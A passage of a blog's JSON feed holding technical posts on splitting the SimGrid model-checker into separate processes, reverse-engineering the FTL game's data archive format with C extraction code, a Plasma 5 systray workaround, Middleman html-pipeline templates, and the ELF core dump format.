void MC_pre_modelcheck_safety()\n{\n\n  int mc_mem_set = (mmalloc_get_current_heap() == mc_heap);  // <*>\n\n  mc_state_t initial_state = NULL;\n  smx_process_t process;\n\n  /* Create the initial state and push it into the exploration stack */\n  if (!mc_mem_set)                                           // <*>\n    MC_SET_MC_HEAP;                                          // <*>\n\n  if (_sg_mc_visited > 0)\n    visited_states = xbt_dynar_new(sizeof(mc_visited_state_t),\n      visited_state_free_voidp);\n\n  initial_state = MC_state_new();\n\n  MC_SET_STD_HEAP;                                           // <*>\n\n  /* Wait for requests (schedules processes) */\n  MC_wait_for_requests();\n\n  MC_SET_MC_HEAP;                                            // <*>\n\n  /* Get an enabled process and insert it in the interleave set\n     of the initial state */\n  xbt_swag_foreach(process, simix_global->process_list) {\n    if (MC_process_is_enabled(process)) {\n      MC_state_interleave_process(initial_state, process);\n      if (mc_reduce_kind != e_mc_reduce_none)\n        break;\n    }\n  }\n\n  xbt_fifo_unshift(mc_stack, initial_state);\n\n  if (!mc_mem_set)                                           // <*>\n    MC_SET_STD_HEAP;                                         // <*>\n}\n
\n\n\n

The heap management code was cumbersome and difficult to maintain: it\nwas necessary to know which function had to be called in each\ncontext, which function was selecting the correct heap, and to select the\ncurrent heap accordingly. It was moreover necessary to know which\ndata was allocated in which heap. Failing to use the correct heap\ncould lead to errors such as:

\n\n

Goals and solutions

\n

While this design was interesting for the performance of the\nmodel-checker, it was quite difficult to maintain and understand. We\nwanted to create a new version of the model-checker which would be\nsimpler to understand and maintain:

\n\n

In order to avoid the coexistence of the two heaps we envisioned two\npossible solutions:

\n\n

While the dynamic-linker based solution is quite interesting and would\nprovide better performance by avoiding context switches (and who\ndoesn't want to write their own dynamic linker?), it would probably be\ndifficult to achieve and would probably not make the code easier to\nunderstand.

\n

We chose to use the much more standard solution of using different\nprocesses which is conceptually much simpler and provides a better\nisolation between the model-checker and the model-checked application.\nWith this design, the model-checker is a quite standard process: all\ndebugging tools can be used without any problem (Valgrind, GDB) on the\nmodel-checker process. The model-checked process is not completely\nstandard as we are constantly overwriting its state but we can still\nptrace it and use a debugger.

\n

Update (2016-04-01): the model-checker now ptraces the\nmodel-checked application (for various reasons) and it is not possible\nto debug the model-checked application anymore. However, we have a\nfeature to replay an execution of the model-checked application\noutside of the model-checker.

\n

Splitting the model-checker and the simulator

\n

In this new design, the model-checker process behaves somehow like a\ndebugger for the simulated (model-checked) application by monitoring\nand controlling its execution. The model-checker process is\nresponsible for:

\n\n

The simulated application is responsible for:

\n\n

Two mechanisms are used to implement the interaction between the\nmodel-checker process and the model-checked application:

\n\n

Since Linux 3.2, it is possible to read from and write to another\nprocess virtual\nmemory\nwithout ptrace()-ing it: I took care not to use ptrace() in order\nto be able to use it for another purpose (a process can only be\nptraced by a single process at a time):

\n\n
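For example, a remote read with process_vm_readv() can be sketched as follows (read_remote is an illustrative wrapper, not SimGrid's actual code):

```c
#define _GNU_SOURCE
#include <sys/types.h>
#include <sys/uio.h>
#include <string.h>
#include <unistd.h>

/* Read `len` bytes at `remote_addr` in process `pid` into `dst`,
   without ptrace(), using process_vm_readv() (Linux >= 3.2). */
ssize_t read_remote(pid_t pid, void *dst, const void *remote_addr, size_t len)
{
    struct iovec local  = { .iov_base = dst, .iov_len = len };
    struct iovec remote = { .iov_base = (void *)remote_addr, .iov_len = len };
    return process_vm_readv(pid, &local, 1, &remote, 1, 0);
}
```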

The split has been done in two phases:

\n
    \n
  1. \n

In the first phase, the split process mode was implemented but the\n single-process mode was still present and enabled by\n default. This allowed us to detect regressions with the single-process\n mode and compare both modes of operation. The resulting code was\n quite ugly because it had to handle both modes of operation.

    \n
  2. \n
  3. \n

    When the split process mode was complete and working correctly, the\n single-process mode was removed and a lot of cleanup could be done.

    \n
  4. \n
\n

Explicit communications

\n

The model-checker process and the model-checked process application\ncommunicate with each other over a UNIX datagram socket. This socket\nis created by the model-checker and passed to the child model-checked\nprocess.

\n
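Setting up such a channel can be sketched with socketpair(): one end stays in the model-checker, the other is inherited by the forked child (make_channel is an illustrative helper, not SimGrid's actual code):

```c
#include <sys/socket.h>
#include <sys/types.h>

/* Create a connected UNIX datagram socket pair; fds[0] is kept by
   the model-checker, fds[1] is inherited across fork() by the
   model-checked child process. */
int make_channel(int fds[2])
{
    return socketpair(AF_UNIX, SOCK_DGRAM, 0, fds);
}
```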

This is used in the initialisation:

\n\n

This is used in runtime to control the execution of the model-checked\napplication:

\n\n

The (simplified) client-loop looks like this:

\n
void MC_client_main_loop(void)\n{\n  while (1) {\n    message_type message;\n    receive_message(&message);\n    switch(message.type()) {\n\n    // Executes a simcall:\n    case MC_MESSAGE_SIMCALL_HANDLE:\n      execute_transition(message.transition());\n      send_message(MC_MESSAGE_WAITING);\n      break;\n\n    // Execute application code until a visible simcall is reached:\n    case MC_MESSAGE_CONTINUE:\n      execute_application_code();\n      send_message(MC_MESSAGE_WAITING);\n      break;\n\n    // [...] (Other messages here)\n    }\n  }\n}\n
\n\n\n

Each model-checking algorithm (safety, liveness, communication\ndeterminism) is implemented as model-checker side code which triggers\nexecution of model-checked-side transitions with:

\n
// Execute a simcall (MC_MESSAGE_SIMCALL_HANDLE):\nMC_simcall_handle(req, value);\n\n// Execute simulated application code (MC_MESSAGE_CONTINUE):\nMC_wait_for_requests();\n
\n\n\n

The communication determinism algorithm needs to see the result of\nsome simcalls before triggering the application code:

\n
MC_simcall_handle(req, value);\nMC_handle_comm_pattern(call, req, value, communication_pattern, 0);\nMC_wait_for_requests();\n
\n\n\n

Snapshot/restore

\n

Snapshot and restoration is handled by reading/writing the\nmodel-checked process memory with /proc/$pid/mem. During this\noperation, the model-checked process is waiting for messages on a\nspecial stack dedicated to the simulator (which is not managed by the\nsnapshotting logic). During this time, the model-checked application\nis not supposed to be accessing the simulated application memory.\nWhen this is finished, the model-checker wakes up the simulated\napplication with the MC_MESSAGE_SIMCALL_HANDLE and\nMC_MESSAGE_CONTINUE messages.

\n
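This kind of remote read can be sketched as follows: /proc/$pid/mem is seekable and virtual addresses are used directly as file offsets (read_process_memory is an illustrative helper, not SimGrid's actual code):

```c
#define _GNU_SOURCE
#include <fcntl.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>

/* Read `len` bytes at virtual address `addr` of process `pid`
   through /proc/$pid/mem. */
ssize_t read_process_memory(pid_t pid, uintptr_t addr, void *dst, size_t len)
{
    char path[64];
    snprintf(path, sizeof path, "/proc/%d/mem", (int)pid);
    int fd = open(path, O_RDONLY);
    if (fd < 0)
        return -1;
    /* The virtual address is the offset into the file. */
    ssize_t res = pread(fd, dst, len, (off_t)addr);
    close(fd);
    return res;
}
```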

Peeking at the state of the model-checked application

\n

The model-checker needs to read some of the state of the simulator\n(state of the communications, name of the processes and so on).\nCurrently this is handled quite brutally by reading the data directly\nfrom the structures of the model-checked process (following linked-list\nitems, array elements, etc. in the remote process):

\n
// Read the hostname from the MCed process:\nprocess->read_bytes(&host_copy, sizeof(host_copy), remote(p->host));\nint len = host_copy.key_len + 1;\nchar hostname[len];\nprocess->read_bytes(hostname, len, remote(host_copy.key));\ninfo->hostname = mc_model_checker->get_host_name(hostname);\n
\n\n\n

This is quite ugly and should probably be replaced by some more\nstructured way to share this information in the future.

\n

Impact on the user interface

\n

We now have a simgrid-mc executable for the model-checker process.\nIt must be called explicitly by the user in order to use the\nmodel-checker (similarly to gdb or other debugging tools):

\n
# Running the raw application:\n./bugged1\n\n# Running the application in GDB:\ngdb --args ./bugged1\n\n# Running the application in valgrind:\nvalgrind ./bugged1\n\n# Running the application in SimgridMC:\nsimgrid-mc ./bugged1\n
\n\n\n

For SMPI applications, the -wrapper argument of smpirun must be\nused:

\n
# Running the raw application:\nsmpirun \\\n  -hostfile hostfile -platform platform.xml \\\n  --cfg=maxmin/precision:1e-9 --cfg=network/model:SMPI \\\n  --cfg=network/TCP_gamma:4194304 \\\n  -np 4 --cfg=smpi/send_is_detached_thres:0 --cfg=smpi/coll_selector:mpich \\\n  --cfg=contexts/factory:ucontext --cfg=contexts/stack_size:4 \\\n  ./dup\n\n# Running the application in GDB:\nsmpirun -wrapper \"gdb --args\" \\\n  -hostfile hostfile -platform platform.xml \\\n  --cfg=maxmin/precision:1e-9 --cfg=network/model:SMPI \\\n  --cfg=network/TCP_gamma:4194304 \\\n  -np 4 --cfg=smpi/send_is_detached_thres:0 --cfg=smpi/coll_selector:mpich \\\n  --cfg=contexts/factory:ucontext --cfg=contexts/stack_size:4 \\\n  ./dup\n\n# Running the application in valgrind:\nsmpirun -wrapper \"valgrind\" \\\n  -hostfile hostfile -platform platform.xml \\\n  --cfg=maxmin/precision:1e-9 --cfg=network/model:SMPI \\\n  --cfg=network/TCP_gamma:4194304 \\\n  -np 4 --cfg=smpi/send_is_detached_thres:0 --cfg=smpi/coll_selector:mpich \\\n  --cfg=contexts/factory:ucontext --cfg=contexts/stack_size:4 \\\n  ./dup\n\n# Running the application in SimgridMC:\nsmpirun -wrapper \"simgrid-mc\" \\\n  -hostfile hostfile -platform platform.xml \\\n  --cfg=maxmin/precision:1e-9 --cfg=network/model:SMPI \\\n  --cfg=network/TCP_gamma:4194304 \\\n  -np 4 --cfg=smpi/send_is_detached_thres:0 --cfg=smpi/coll_selector:mpich \\\n  --cfg=contexts/factory:ucontext --cfg=contexts/stack_size:4 \\\n  ./dup\n
\n\n\n

Under the hood, simgrid-mc sets a few environment variables for its\nchild process:

\n\n

Cleanup

\n

After implementing the separate mode, the single-process mode has been\nremoved in order to have a cleaner code. In order to have the two\nmodes of operation coexist, many functions were checking the mode of\noperation and the behaviour was changing depending on the mode. Most\nof this code has been removed and the result is now much simpler.

\n

The code managing the two heaps is now useless and has been completely\nremoved. We are still using our custom heap implementation in the\nmodel-checked application however: we are using its internal\nrepresentation to track the different allocations in the heap; it is\nused as well in order to clear the bytes of an allocation before\ngiving it to the application. The model-checker process however\nis a quite standard application and uses the standard system heap\nimplementation (or could use another implementation) which is expected\nto have better performance than our implementation.

\n

Currently, it is not quite clear which parts of the API are intended to\nbe used by the model-checked process, which parts are to be used by the\nmodel-checker process and which parts can be used by both. Some\neffort has been made to separate the different parts of the API (by\nmoving them to different header files) but this is still an ongoing\nprocess. In the future, we might want to have a better organisation\nusing different header files, namespaces and possibly different\nshared-objects for the different parts of the API.

\n

A longer-term goal would be to have a nice API for the model-checker\nwhich could easily be used by the users to write their own\nmodel-checking algorithms (in their own executables). We might even\nwant to export a Lua-based binding to write the model-checking\nalgorithms.

\n

Conversion to C++

\n

In parallel, the model-checker code has been ported to C++ and a part\nof it has been rewritten in a more idiomatic C++:

\n\n

All the MC code has been converted to C++ but the conversion to\nidiomatic C++ is still ongoing: some parts of the code are still using\nC idioms.

\n

Performance

\n

This first version is quite a bit slower than the previous one. This\nwas expected: the new implementation relies on cross-process\ncommunications while the old version had been heavily optimised.\nThis might be improved in the future by minimising the overhead of\ncross-process synchronisations.

\n

Conclusion

\n

This is a first step towards a cleaner and simpler SimGridMC. The\nheap-juggling code has been removed. In exchange, however, we now have\nsome code which reads directly from the data structures of the other\nprocess: this code is neither very nice nor very maintainable and we\nwill probably want to find a better way to do this.

\n

Some things still need to be done:

\n"}, {"id": "http://www.gabriel.urdhr.fr/2015/08/16/ftl-data/", "title": "FTL data file", "url": "https://www.gabriel.urdhr.fr/2015/08/16/ftl-data/", "date_published": "2015-08-16T00:00:00+02:00", "date_modified": "2015-08-16T00:00:00+02:00", "tags": ["computer", "video-game", "ftl", "reverse-engineering"], "content_html": "

FTL\nis a very nice (and quite difficult)\nrogue-like-ish game with space battles, teleporters, management of the energy of\nyour ship, asteroid fields, alien species, droids (drones), etc.\nIt is quite cheap, DRM-free\nand available natively on Intel-based GNU/Linux.\nThese are notes taken while trying to find out the format of the .dat files of\nthe game containing the game assets, ship statistics, events, etc.,\nwhen I had no access to the internet to find the solution.\nThere's a companion C program, ftldat,\nfor extracting the files from the archives and generating new ones.\nUnsurprisingly, similar tools\nwith the same name already exist. However, the description of the process\nof reverse-engineering a (very simple) binary format might be interesting for\nsomeone out there.

\n

Trying to see what's in the FTL data files, we find two binary files,\ndata.dat and resource.dat.\nThe latter is quite large and obviously contains the assets of the game.\nThe former is quite small; looking at it, we find interesting structure as\nwell as embedded XML and text files containing the ship statistics and layouts,\nthe tutorial, character names, events, achievements, etc.

\n

Looking at data.dat

\n

file doesn't know what this file is supposed to be:

\n
$ file data.dat\ndata.dat: data\n
\n\n

Looking at the content of this file with less, we find:\n

    \n
  1. the beginning is very regular with what looks like increasing\n sequences of little-endian 32-bit values,\n

    \n             0 1  2 3  4 5  6 7  8 9  a b  c d  e f\n  00000000: 680c 0000 a431 0000 fa37 0000 213b 0000  h....1...7..!;..\n  00000010: 7e41 0000 bb48 0000 a34d 0000 ae51 0000  ~A...H...M...Q..\n  00000020: ac16 0100 af18 0100 1968 0100 b3a0 0100  .........h......\n  00000030: 4fa8 0100 9aae 0100 e5b4 0100 31bb 0100  O...........1...\n  00000040: 87bc 0100 dbc2 0100 f2c4 0100 87cc 0100  ................\n  
    \n
  2. \n

  3. then a lot of zeros,\n

    \n              0 1  2 3  4 5  6 7  8 9  a b  c d  e f\n  000002c0: 0000 0000 0000 0000 0000 0000 0000 0000  ................\n  000002d0: 0000 0000 0000 0000 0000 0000 0000 0000  ................\n  000002e0: 0000 0000 0000 0000 0000 0000 0000 0000  ................\n  000002f0: 0000 0000 0000 0000 0000 0000 0000 0000  ................\n  00000300: 0000 0000 0000 0000 0000 0000 0000 0000  ................\n  00000310: 0000 0000 0000 0000 0000 0000 0000 0000  ................\n  00000320: 0000 0000 0000 0000 0000 0000 0000 0000  ................\n  
    \n
  4. \n

  5. then a lot of (XML and text) files prepended with their file names,\n

    \n            0 1  2 3  4 5  6 7  8 9  a b  c d  e f\n  000031a0: 0000 0000 2f06 0000 1f00 0000 6461 7461  ..../.......data\n  000031b0: 2f6a 656c 6c79 5f63 726f 6973 7361 6e74  /jelly_croissant\n  000031c0: 5f70 6972 6174 652e 786d 6c3c 212d 2d20  _pirate.xml....<\n  
    \n
  6. \n
\n

This looks like an archive of files.

\n

File structure

\n

There is no terminator at the end of the file name so the length of\nthe file name must be stored somewhere else. The length of this file\nname is 31 (0x1f) which is found just a few bytes before the file name.\nApparently the bytes 0x000031a8--0x000031ab are the file name size in\nlittle-endian. The preceding 32 bits are a bigger integer value 0x62f\n(1583) which is probably the file length.

\n

It seems that a file is described by the following structure (in pseudo-C):

\n
struct ftl_file {\n  uint32_t data_size; // Little endian\n  uint32_t name_size; // Little endian\n  char name[name_size];\n  char data[data_size];\n};\n
\n\n\n

We can get the list of the files in the archive with:

\n
strings data.dat | grep ^data | sed 's/\\(\\....\\).*/\\1/'\n
\n\n\n

Which gives:

\n
data/jelly_croissant_pirate.xml\ndata/boss_1_easy.txt\ndata/mantis_scout_pirate.xml\ndata/crystal_cruiser.xml\ndata/jelly_cruiser_2.txt\ndata/kestral.txt\ndata/dlcBlueprintsOverwrite.xml\ndata/rebel_long_pirate.txt\ndata/tutorial.xml\ndata/achievements.xml\ndata/kestral_3.xml\ndata/fed_scout.xml\ndata/rock_scout.xml\ndata/jelly_button_pirate.xml\ndata/rock_scout.txt\ndata/rock_assault.xml\ndata/boss_3_easy.txt\ndata/rebel_long.xml\ndata/names.xml\ndata/dlcAnimations.xml\ndata/anaerobic_cruiser_2.txt\ndata/anaerobic_cruiser.txt\ndata/circle_bomber.xml\ndata/dlcEvents_anaerobic.xml\ndata/energy_bomber_pirate.xml\ndata/crystal_bomber.txt\ndata/dlcPirateBlueprints.xml\ndata/dlcSounds.xml\ndata/blueprints.xml\n[...]\n
\n\n

Header

\n

Now that the structure of the end of the archive is known, the\nfollowing questions remain:

\n
    \n
  1. \n

    What is the role of the beginning of the archive?

    \n
  2. \n
  3. \n

    How are the file structures located inside the archive?

    \n
  4. \n
\n

The first part of the archive is a list of increasing little-endian 32 bit values.

\n

The ftl_file structure for the first file\n(data/jelly_croissant_pirate.xml) is at offset 0x31a4 within the archive.\nIt turns out that this value is the second 32-bit integer in the archive\n(at offset 0x4). Each subsequent offset is the offset of another file structure.

\n

The following zeros are probably unused/empty offset slots.

\n

The only unexplained part of the archive is the meaning of the first 32-bit\nvalue. It does not give the offset of a file structure.\nIt's probably not a magic number because changing the value slightly\ndoes not prevent the game from loading. However using 0 makes the\nprogram crash so it's not useless either.

\n

There are 0x31a0/4 = 0xc68 offset slots (either used or unused),\nexcluding the first 32-bit value of the file which is not an offset\nwithin the file: this is exactly the value of the first 32 bits. It\nseems the first 32 bits are the number of offset/file slots.

\n
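This arithmetic can be checked in a couple of lines of C. The offsets are the ones from the hex dumps above; `slot_count` is just a helper name for this sketch:

```c
#include <stdint.h>

/* Hypothetical helper: number of offset slots implied by the position
   of the first file structure, assuming the offset table starts right
   after the initial 32-bit slot count. */
static uint32_t slot_count(uint32_t first_file_offset) {
    return (first_file_offset - sizeof(uint32_t)) / sizeof(uint32_t);
}
```

With the first file structure at 0x31a4, this gives 0xc68 slots, matching the first 32-bit value of data.dat.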

Summary of the file structure

\n
    \n
  1. \n

    number of offset/file slots (32 bit little-endian);

    \n
  2. \n
  3. \n

    32-bit little-endian offsets of each file structure within the archive\n (zeros are ignored);

    \n
  4. \n
  5. \n

    At each non-zero offset, a file is described by:

    \n
  6. \n
\n

a. file data size (32-bit little endian);

\n

b. file name size (32-bit little endian);

\n

c. file name;

\n

d. file data.

\n

In pseudo-C, the archive starts with a header:

\n
struct ftl_data_header {\n  uint32_t slots_count; // Little-endian\n  uint32_t file_offsets[slots_count]; // Little-endian offsets for struct ftl_file\n};\n
\n\n\n

Extracting the files

\n

We can extract the archive with this code (simplified version excluding error\nhandling and endianness issues for exposition):

\n
FILE* file = fopen(\"data.dat\", \"rb\");\n\nuint32_t slots_count;\nfread(&slots_count, sizeof(slots_count), 1, file);\n\nuint32_t* slots = malloc(slots_count * sizeof(uint32_t));\nfread(slots, sizeof(uint32_t), slots_count, file);\n\nfor (uint32_t i = 0; i != slots_count; ++i) {\n\n  uint32_t offset = slots[i];\n  if (offset == 0)\n    continue;\n  fseek(file, offset, SEEK_SET);\n\n  uint32_t data_size;\n  fread(&data_size, sizeof(data_size), 1, file);\n\n  uint32_t name_size;\n  fread(&name_size, sizeof(name_size), 1, file);\n\n  char* name = malloc(name_size + 1);\n  fread(name, 1, name_size, file);\n  name[name_size] = '\\0';\n\n  void* data = malloc(data_size);\n  fread(data, 1, data_size, file);\n\n  create_directory_for(name);\n  FILE* output = fopen(name, \"wb\");\n  fwrite(data, 1, data_size, output);\n\n  fclose(output);\n  free(data);\n  free(name);\n}\nfree(slots);\nfclose(file);\n
\n\n\n

Extracting resources.dat

\n

The same format is used for resources.dat and we can extract the\nassets (images, sounds, music, etc.) with the same program:

\n
\naudio/music/bp_MUS_RockmenBATTLE.ogg\naudio/music/bp_MUS_DebrisEXPLORE.ogg\n[...]\naudio/waves/ui/select_down2.wav\naudio/waves/ui/bp_SFX_NewShipUnlocked.ogg\n[...]\nimg/pause_large_on.png\nimg/pause_teleport_leave.png\n[...]\n
\n\n

Recreating the archive

\n

The archive can be recreated with this code (again excluding error handling\nand endianness):

\n
FILE* output = fopen(archive_name, \"wb\");\n\nuint32_t slots_count = 0xc68;\nif (file_count > slots_count)\n  slots_count = file_count;\nuint32_t temp_slot_count = htole32(slots_count);\nfwrite(&temp_slot_count, sizeof(uint32_t), 1, output);\n\nuint32_t* slots = calloc(slots_count, sizeof(uint32_t));\nfwrite(slots, sizeof(uint32_t), slots_count, output);\n\nfor (int i = 0; i != file_count; ++i) {\n\n  const char* file_name = files[i];\n  long offset = ftell(output);\n  slots[i] = htole32(offset);\n  FILE* file = fopen(file_name, \"rb\");\n\n  int fd = fileno(file);\n  struct stat file_stat;\n  fstat(fd, &file_stat);\n  uint32_t data_size = file_stat.st_size;\n  uint32_t temp_data_size = htole32(data_size);\n  fwrite(&temp_data_size, sizeof(uint32_t), 1, output);\n\n  uint32_t name_size = strlen(file_name);\n  uint32_t temp_name_size = htole32(name_size);\n  fwrite(&temp_name_size, sizeof(uint32_t), 1, output);\n  fwrite(file_name, sizeof(char), name_size, output);\n\n  char* data = malloc(data_size);\n  fread(data, sizeof(char), data_size, file);\n  fwrite(data, sizeof(char), data_size, output);\n\n  free(data);\n  fclose(file);\n}\n\nfseek(output, sizeof(uint32_t), SEEK_SET);\nfwrite(slots, sizeof(uint32_t), slots_count, output);\n\nfree(slots);\nfclose(output);\n
"}, {"id": "http://www.gabriel.urdhr.fr/2015/07/29/i-can-has-systray/", "title": "I can has systray?", "url": "https://www.gabriel.urdhr.fr/2015/07/29/i-can-has-systray/", "date_published": "2015-07-29T00:00:00+02:00", "date_modified": "2015-07-29T00:00:00+02:00", "tags": ["computer", "gui", "kde"], "content_html": "

In Plasma 5, support for the XEmbed-based\n\u201clegacy\u201d systray protocol\nwas removed:\nonly the new SNI protocol is handled.\nHowever, in the real world a lot of applications do not handle the new protocol:\nQt4 and Qt5 applications can be fixed\nby installing the sni-qt (currently in experimental) and libdbusmenu-qt5 respectively\nbut other applications (such as GTK ones) must be patched/recompiled with SNI support.\nWithout this, windows disappear into oblivion \"\ud83d\ude3f\".\nYou can have a seamless systray-enabled Plasma panel\nwith a single (OK, two) line of shell \"\ud83d\ude3c\".

\n

Implementation

\n

First, resize your panel and remove some space on the right\n(this is where we're going to add a new panel):

\n

\"\"

\n

Then install trayer and run:

\n
trayer --align right --widthtype pixel --width 150 --transparent false \\\n  --heighttype pixel --height 30 --alpha 230 --padding 10\n
\n\n\n

Now, you have systrays in your panel: \"\ud83d\ude38\"

\n

\"\"

\n

You might need to adjust the parameters of trayer and resize the panel in\norder to have a seamless panel.

\n

Installation

\n

You can then add a script to do this (mine is in ~/.bin/icanhazsystray):

\n
#!/bin/sh\nexec trayer --align right --widthtype pixel --width 150 --transparent false \\\n  --heighttype pixel --height 30 --alpha 230 --padding 10\n
\n\n\n

Now, you can ask Plasma to run this script when starting the session.

\n

The new Plasma 5 is quite nice by the way (but the lack of classic\nsystray is not so nice).

\n

References

\n"}, {"id": "http://www.gabriel.urdhr.fr/2015/07/04/html-pipeline-middleman/", "title": "Use HTML pipeline in Middleman", "url": "https://www.gabriel.urdhr.fr/2015/07/04/html-pipeline-middleman/", "date_published": "2015-07-04T00:00:00+02:00", "date_modified": "2015-07-04T00:00:00+02:00", "tags": ["computer", "middleman", "ruby", "html", "tilt", "rack", "emoji", "markdown", "web"], "content_html": "

How to use html-pipeline in\nmiddleman.

\n

Why

\n

The idea is to be able to add postprocessing steps after the markdown processing.\nThe same idea can be used to wrap a default tilt template with any kind of\npostprocessing operations.

\n

How

\n

We need those gems (Gemfile):

\n
gem 'html-pipeline'\ngem 'github-linguist'\ngem 'github-markdown'\n# Ships with non-free emojis but you can use free ones:\ngem 'gemoji'\n
\n\n\n

Define a tilt template based on a given\nhtml-pipeline (lib/mytemplate.rb) generating HTML from markdown:

\n
require 'tilt/template'\n\nclass MarkdownHtmlFilterTemplate < Tilt::Template\n  self.default_mime_type = \"text/html\"\n\n  def self.engine_initialized?\n    defined? ::Pygments and defined? ::Html::Pipeline and defined? ::Linguist\n  end\n\n  def initialize_engine\n    require 'html/pipeline'\n    require 'linguist'\n    require \"pygments\"\n  end\n\n  def prepare\n    @engine = HTML::Pipeline.new [\n      HTML::Pipeline::MarkdownFilter,\n      HTML::Pipeline::EmojiFilter,\n      HTML::Pipeline::SyntaxHighlightFilter,\n      HTML::Pipeline::TableOfContentsFilter\n    ], :asset_root => \"/\", :gfm => false\n  end\n\n  def evaluate(scope, locals, &block)\n    @output ||= @engine.call(data)[:output].to_s\n  end\n\nend\n
\n\n\n

Use it in middleman (config.rb) for processing markdown files:

\n
require 'lib/mytemplate'\n# We need to omit the Template suffix:\nset :markdown_engine, :MarkdownHtmlFilter
\n\n\n

Alternative: rack filter

\n

Another solution is to use rack filter:

\n
module Rack\n  class MyEmojiFilter\n\n    def initialize(app, options = {})\n      @app = app\n      @options = options\n    end\n\n    def call(env)\n      status, headers, response = @app.call(env)\n      if headers[\"Content-Type\"] and headers[\"Content-Type\"].include? \"text/html\"\n        html = \"\"\n        response.each { |chunk| html << chunk }\n        html = process(html)\n        headers['Content-Type'] = \"text/html; charset=utf-8\"\n        headers['Content-Length'] = \"\".respond_to?(:bytesize) ? html.bytesize.to_s : html.size.to_s\n        [status, headers, [html]]\n      else\n        [status, headers, response]\n      end\n    end\n\n    def process(html)\n      html.gsub(/:([a-zA-Z0-9_]{1,}):/) do |match|\n        emoji = $1\n        \"<img class='emoji' src='/img/emoji/#{emoji}.png' alt=':#{emoji}:' />\"\n      end\n    end\n\n  end\nend\n
\n\n\n

The difference is that this processes all the files and their whole\ncontent.

\n

Alternative: extending the basic template by composition

\n
class MarkdownTemplate < Tilt::Template\n  self.default_mime_type = \"text/html\"\n  def self.engine_initialized?\n    defined? ::Tilt::KramdownTemplate\n  end\n  def initialize_engine\n    require 'tilt/markdown'\n  end\n  def prepare\n    @template = Tilt::KramdownTemplate.new(@file, @line, @options, &@reader)\n  end\n  # Takes the rendered HTML and replaces :emoji: tokens with images:\n  def replace_emoji(text)\n    text.gsub(/:([a-zA-Z0-9_]{1,}):/) do |match|\n      \"<img class='emoji' src='/img/emoji/#{$1}.png' alt=':#{$1}:' />\"\n    end\n  end\n  def evaluate(scope, locals, &block)\n    @output ||= replace_emoji(@template.render(scope, locals, &block))\n  end\nend
\n\n\n

Alternative: extending the processor

\n

This monkey-patches the Kramdown parser in order to recognise emojis:

\n
require 'kramdown/parser/kramdown.rb'\n\nmodule Kramdown\n  module Parser\n    class Kramdown\n      alias_method :old_emoji_initialize, :initialize\n      def initialize(source, options)\n        old_emoji_initialize source, options\n        @span_parsers.unshift(:emoji)\n      end\n      def parse_emoji\n        start_line_number = @src.current_line_number\n        @src.pos += @src.matched_size\n        emoji = @src[1]\n        el = Element.new(:img, nil, nil, :location => start_line_number)\n        add_link(el, \"/img/emoji/#{emoji}.png\", nil, \":#{emoji}:\")\n      end\n      EMOJI_MATCH = /:([0-9a-zA-Z_]{1,}):/\n      define_parser(:emoji, EMOJI_MATCH)\n    end\n  end\nend\n
"}, {"id": "http://www.gabriel.urdhr.fr/2015/05/29/core-file/", "title": "Anatomy of an ELF core file", "url": "https://www.gabriel.urdhr.fr/2015/05/29/core-file/", "date_published": "2015-05-29T00:00:00+02:00", "date_modified": "2015-05-29T00:00:00+02:00", "tags": ["computer", "system", "elf", "coredump"], "content_html": "

The ELF format is used for\ncompilation outputs (.o files), executables, shared libraries and core dumps.\nThe first three cases are documented in the System V ABI\nspecification\nand the TIS ELF\nspecification but there does not\nseem to be much documentation about the usage of the ELF format for core dumps.\nHere are some notes on this.

\n

Let's create a core dump and look at it:

\n
pid=$(pgrep xchat)\ngcore $pid\nreadelf -a core.$pid\n
\n\n\n

ELF header

\n

Nothing special here, except that e_type=ET_CORE marks\nthe file as a core file:

\n
\nELF Header:\n  Magic:   7f 45 4c 46 02 01 01 00 00 00 00 00 00 00 00 00\n  Class:                             ELF64\n  Data:                              2's complement, little endian\n  Version:                           1 (current)\n  OS/ABI:                            UNIX - System V\n  ABI Version:                       0\n  Type:                              CORE (Core file)\n  Machine:                           Advanced Micro Devices X86-64\n  Version:                           0x1\n  Entry point address:               0x0\n  Start of program headers:          64 (bytes into file)\n  Start of section headers:          57666560 (bytes into file)\n  Flags:                             0x0\n  Size of this header:               64 (bytes)\n  Size of program headers:           56 (bytes)\n  Number of program headers:         344\n  Size of section headers:           64 (bytes)\n  Number of section headers:         346\n  Section header string table index: 345\n
\n\n

Program headers

\n
\nProgram Headers:\n  Type           Offset             VirtAddr           PhysAddr\n                 FileSiz            MemSiz              Flags  Align\n  NOTE           0x0000000000004b80 0x0000000000000000 0x0000000000000000\n                 0x0000000000009064 0x0000000000000000  R      1\n  LOAD           0x000000000000dbe4 0x0000000000400000 0x0000000000000000\n                 0x0000000000000000 0x000000000009d000  R E    1\n  LOAD           0x000000000000dbe4 0x000000000069c000 0x0000000000000000\n                 0x0000000000004000 0x0000000000004000  RW     1\n  LOAD           0x0000000000011be4 0x00000000006a0000 0x0000000000000000\n                 0x0000000000004000 0x0000000000004000  RW     1\n  LOAD           0x0000000000015be4 0x0000000001872000 0x0000000000000000\n                 0x0000000000ed4000 0x0000000000ed4000  RW     1\n  LOAD           0x0000000000ee9be4 0x00007f248c000000 0x0000000000000000\n                 0x0000000000021000 0x0000000000021000  RW     1\n  LOAD           0x0000000000f0abe4 0x00007f2490885000 0x0000000000000000\n                 0x000000000001c000 0x000000000001c000  R      1\n  LOAD           0x0000000000f26be4 0x00007f24908a1000 0x0000000000000000\n                 0x000000000001c000 0x000000000001c000  R      1\n  LOAD           0x0000000000f42be4 0x00007f24908bd000 0x0000000000000000\n                 0x00000000005f3000 0x00000000005f3000  R      1\n  LOAD           0x0000000001535be4 0x00007f2490eb0000 0x0000000000000000\n                 0x0000000000000000 0x0000000000002000  R E    1\n  LOAD           0x0000000001535be4 0x00007f24910b1000 0x0000000000000000\n                 0x0000000000001000 0x0000000000001000  R      1\n  LOAD           0x0000000001536be4 0x00007f24910b2000 0x0000000000000000\n                 0x0000000000001000 0x0000000000001000  RW     1\n  LOAD           0x0000000001537be4 0x00007f24910b3000 0x0000000000000000\n                 0x0000000000060000 0x0000000000060000  RW     1\n  LOAD      
